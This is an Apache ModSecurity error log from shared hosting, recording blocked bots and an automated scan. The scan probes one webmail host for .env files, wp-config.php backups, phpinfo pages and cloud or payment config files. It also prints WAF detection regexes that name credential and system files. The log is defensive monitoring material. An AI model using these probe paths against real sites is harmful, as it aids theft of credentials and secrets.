[Tue May 26 13:29:54.582984 2026] [security2:error] [pid 512745:tid 512882] [client 34.147.88.45:32768] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "webdisk.consultrgb.com"] [uri "/"] [unique_id "ahVS-nKSB_s2CvZg7xNrsgAAARE"]
[Tue May 26 13:29:56.030903 2026] [security2:error] [pid 512745:tid 512979] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS-3KSB_s2CvZg7xNrwwAAAXI"]
[Tue May 26 13:29:57.393612 2026] [security2:error] [pid 512745:tid 512983] [client 74.7.175.190:49702] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.knightmasonsssea.org.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVS_XKSB_s2CvZg7xNr1wABdlg"]
[Tue May 26 13:29:57.924784 2026] [security2:error] [pid 512745:tid 512972] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS_XKSB_s2CvZg7xNr2QAAAWs"]
[Tue May 26 13:30:01.259317 2026] [security2:error] [pid 512745:tid 512963] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTAHKSB_s2CvZg7xNr_wAAAWI"]
[Tue May 26 13:30:02.185889 2026] [security2:error] [pid 512344:tid 512569] [client 104.252.247.126:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVTAcbElyei4S77DQcCsQAAAF8"]
[Tue May 26 13:30:02.512724 2026] [security2:error] [pid 512344:tid 512499] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTAcbElyei4S77DQcCwQAAABk"]
[Tue May 26 13:30:02.652527 2026] [security2:error] [pid 512745:tid 512751] [remote 216.185.214.209:45358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVTAnKSB_s2CvZg7xNsDwABJAU"]
[Tue May 26 13:30:03.304208 2026] [security2:error] [pid 512344:tid 512345] [remote 37.187.156.42:40442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.156.187.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVTA8bElyei4S77DQcC0wAAWAA"]
[Tue May 26 13:30:04.814001 2026] [security2:error] [pid 512344:tid 512580] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTBMbElyei4S77DQcC6AAAAGo"]
[Tue May 26 13:30:05.494951 2026] [security2:error] [pid 512344:tid 512374] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/.env.php"] [unique_id "ahVTBcbElyei4S77DQcDGQAAKR0"]
[Tue May 26 13:30:06.239777 2026] [security2:error] [pid 512344:tid 512450] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVTBsbElyei4S77DQcDdAAAYWk"]
[Tue May 26 13:30:06.579424 2026] [security2:error] [pid 512344:tid 512550] [client 14.191.131.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTBsbElyei4S77DQcDYQAAAEw"]
[Tue May 26 13:30:06.687661 2026] [security2:error] [pid 512344:tid 512474] [client 114.119.138.130:52429] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/homepages/portfolio-agency/&cookie=n"] [unique_id "ahVTBsbElyei4S77DQcDrAAAAAA"], referer: https://www.fisher-shop.de/shop.pl?product=show&id=metfi22-a&link=schatzsuchen.de%40https%3A//www.anujtradingco.com/homepages/portfolio-agency/
[Tue May 26 13:30:06.694654 2026] [security2:error] [pid 512344:tid 512358] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVTBsbElyei4S77DQcDrQAAJg0"]
[Tue May 26 13:30:06.904132 2026] [security2:error] [pid 512344:tid 512388] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVTBsbElyei4S77DQcDwgAAEis"]
[Tue May 26 13:30:06.933150 2026] [security2:error] [pid 512344:tid 512392] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVTBsbElyei4S77DQcDxgAAWy8"]
[Tue May 26 13:30:06.992327 2026] [security2:error] [pid 512344:tid 512560] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTBsbElyei4S77DQcDmAAAAFY"]
[Tue May 26 13:30:07.132753 2026] [security2:error] [pid 512344:tid 512436] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/api/info.php"] [unique_id "ahVTB8bElyei4S77DQcD2AAACFs"]
[Tue May 26 13:30:07.170402 2026] [security2:error] [pid 512344:tid 512413] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/api/phpinfo.php"] [unique_id "ahVTB8bElyei4S77DQcD3QAACEQ"]
[Tue May 26 13:30:08.230686 2026] [security2:error] [pid 512344:tid 512401] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config.php"] [unique_id "ahVTCMbElyei4S77DQcEUwAAADg"]
[Tue May 26 13:30:08.341417 2026] [security2:error] [pid 512344:tid 512406] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/aws.php"] [unique_id "ahVTCMbElyei4S77DQcEYgAANT0"]
[Tue May 26 13:30:08.375979 2026] [security2:error] [pid 512344:tid 512405] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/config.inc.php"] [unique_id "ahVTCMbElyei4S77DQcEZQAAXTw"]
[Tue May 26 13:30:08.402380 2026] [security2:error] [pid 512344:tid 512362] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/config.php"] [unique_id "ahVTCMbElyei4S77DQcEaAAAXRE"]
[Tue May 26 13:30:08.462150 2026] [security2:error] [pid 512344:tid 512415] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/env.php"] [unique_id "ahVTCMbElyei4S77DQcEbQAAPkY"]
[Tue May 26 13:30:08.488677 2026] [security2:error] [pid 512344:tid 512387] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/nexmo.php"] [unique_id "ahVTCMbElyei4S77DQcEcAAAMSo"]
[Tue May 26 13:30:08.495992 2026] [security2:error] [pid 512344:tid 512396] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/module.config.php"] [unique_id "ahVTCMbElyei4S77DQcEcwAAWDM"]
[Tue May 26 13:30:08.553041 2026] [security2:error] [pid 512344:tid 512425] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/stripe.php"] [unique_id "ahVTCMbElyei4S77DQcEewAAc1A"]
[Tue May 26 13:30:09.212253 2026] [security2:error] [pid 512344:tid 512367] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/info.php"] [unique_id "ahVTCcbElyei4S77DQcEwQAALBY"]
[Tue May 26 13:30:09.221754 2026] [security2:error] [pid 512344:tid 512372] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/infophp.php"] [unique_id "ahVTCcbElyei4S77DQcEwgAAfBs"]
[Tue May 26 13:30:09.226943 2026] [security2:error] [pid 512344:tid 512371] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/infos.php"] [unique_id "ahVTCcbElyei4S77DQcEwwAATBo"]
[Tue May 26 13:30:09.720985 2026] [security2:error] [pid 512344:tid 512412] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/php-info.php"] [unique_id "ahVTCcbElyei4S77DQcE9AAACkM"]
[Tue May 26 13:30:09.728684 2026] [security2:error] [pid 512344:tid 512435] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/php.php"] [unique_id "ahVTCcbElyei4S77DQcE9QAAaFo"]
[Tue May 26 13:30:09.739158 2026] [security2:error] [pid 512745:tid 512987] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTCXKSB_s2CvZg7xNsUAAAAXo"]
[Tue May 26 13:30:09.752711 2026] [security2:error] [pid 512344:tid 512387] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/php_info.php"] [unique_id "ahVTCcbElyei4S77DQcE9gAAHio"]
[Tue May 26 13:30:09.771065 2026] [security2:error] [pid 512344:tid 512396] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/phpinfo.php"] [unique_id "ahVTCcbElyei4S77DQcE-AAAKTM"]
[Tue May 26 13:30:09.875059 2026] [security2:error] [pid 512745:tid 512971] [client 176.65.139.232:51528] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "pestcontroldelhi.co.in"] [uri "/.env"] [unique_id "ahVTCXKSB_s2CvZg7xNsWwAAAWo"]
[Tue May 26 13:30:09.921283 2026] [security2:error] [pid 512344:tid 512445] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/public/phpinfo.php"] [unique_id "ahVTCcbElyei4S77DQcFCAAARWQ"]
[Tue May 26 13:30:11.079105 2026] [security2:error] [pid 512344:tid 512437] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/test.php"] [unique_id "ahVTC8bElyei4S77DQcFhQAAXVw"]
[Tue May 26 13:30:11.915361 2026] [security2:error] [pid 512344:tid 512561] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTC8bElyei4S77DQcFowAAAFc"]
[Tue May 26 13:30:12.636534 2026] [security2:error] [pid 512344:tid 512459] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php"] [unique_id "ahVTDMbElyei4S77DQcFvwAATHI"]
[Tue May 26 13:30:12.640448 2026] [security2:error] [pid 512344:tid 512355] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php.bak"] [unique_id "ahVTDMbElyei4S77DQcFwAAATAo"]
[Tue May 26 13:30:12.649460 2026] [security2:error] [pid 512344:tid 512353] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php.new"] [unique_id "ahVTDMbElyei4S77DQcFwQAAWgg"]
[Tue May 26 13:30:12.779648 2026] [security2:error] [pid 512344:tid 512474] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTC8bElyei4S77DQcFfwAAAFo"]
[Tue May 26 13:30:12.988130 2026] [security2:error] [pid 512745:tid 512881] [client 45.148.10.95:19280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVTDHKSB_s2CvZg7xNsjwAAARA"]
[Tue May 26 13:30:12.992706 2026] [security2:error] [pid 512344:tid 512467] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php.old"] [unique_id "ahVTDMbElyei4S77DQcFzQAAPno"]
[Tue May 26 13:30:13.043550 2026] [security2:error] [pid 512344:tid 512541] [client 45.148.10.95:19378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/*update.cgi*"] [unique_id "ahVTDcbElyei4S77DQcFzgAAAEM"]
[Tue May 26 13:30:13.049616 2026] [security2:error] [pid 512344:tid 512482] [client 45.148.10.95:19334] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahVTDcbElyei4S77DQcF0QAAAAg"]
[Tue May 26 13:30:13.228927 2026] [security2:error] [pid 512344:tid 512516] [client 45.148.10.95:19378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.docker/.env"] [unique_id "ahVTDcbElyei4S77DQcF1gAAACo"]
[Tue May 26 13:30:13.236791 2026] [security2:error] [pid 512745:tid 512892] [client 45.148.10.95:19362] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.docker/laravel/app/.env"] [unique_id "ahVTDXKSB_s2CvZg7xNsnAAAARs"]
[Tue May 26 13:30:13.254386 2026] [security2:error] [pid 512745:tid 512918] [client 45.148.10.95:19316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVTDXKSB_s2CvZg7xNsnwAAATU"]
[Tue May 26 13:30:13.326274 2026] [security2:error] [pid 512344:tid 512582] [client 45.148.10.95:19336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.env.bak"] [unique_id "ahVTDcbElyei4S77DQcF3QAAAGw"]
[Tue May 26 13:30:13.341553 2026] [security2:error] [pid 512745:tid 512939] [client 45.148.10.95:19390] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.env.backup"] [unique_id "ahVTDXKSB_s2CvZg7xNsowAAAUo"]
[Tue May 26 13:30:13.499209 2026] [security2:error] [pid 512745:tid 512905] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTDXKSB_s2CvZg7xNskwAAASg"]
[Tue May 26 13:30:13.522922 2026] [security2:error] [pid 512344:tid 512543] [client 45.148.10.95:19274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.env.old"] [unique_id "ahVTDcbElyei4S77DQcF4QAAAEU"]
[Tue May 26 13:30:13.583867 2026] [security2:error] [pid 512344:tid 512513] [client 45.148.10.95:19378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/.env.php"] [unique_id "ahVTDcbElyei4S77DQcF5gAAACc"]
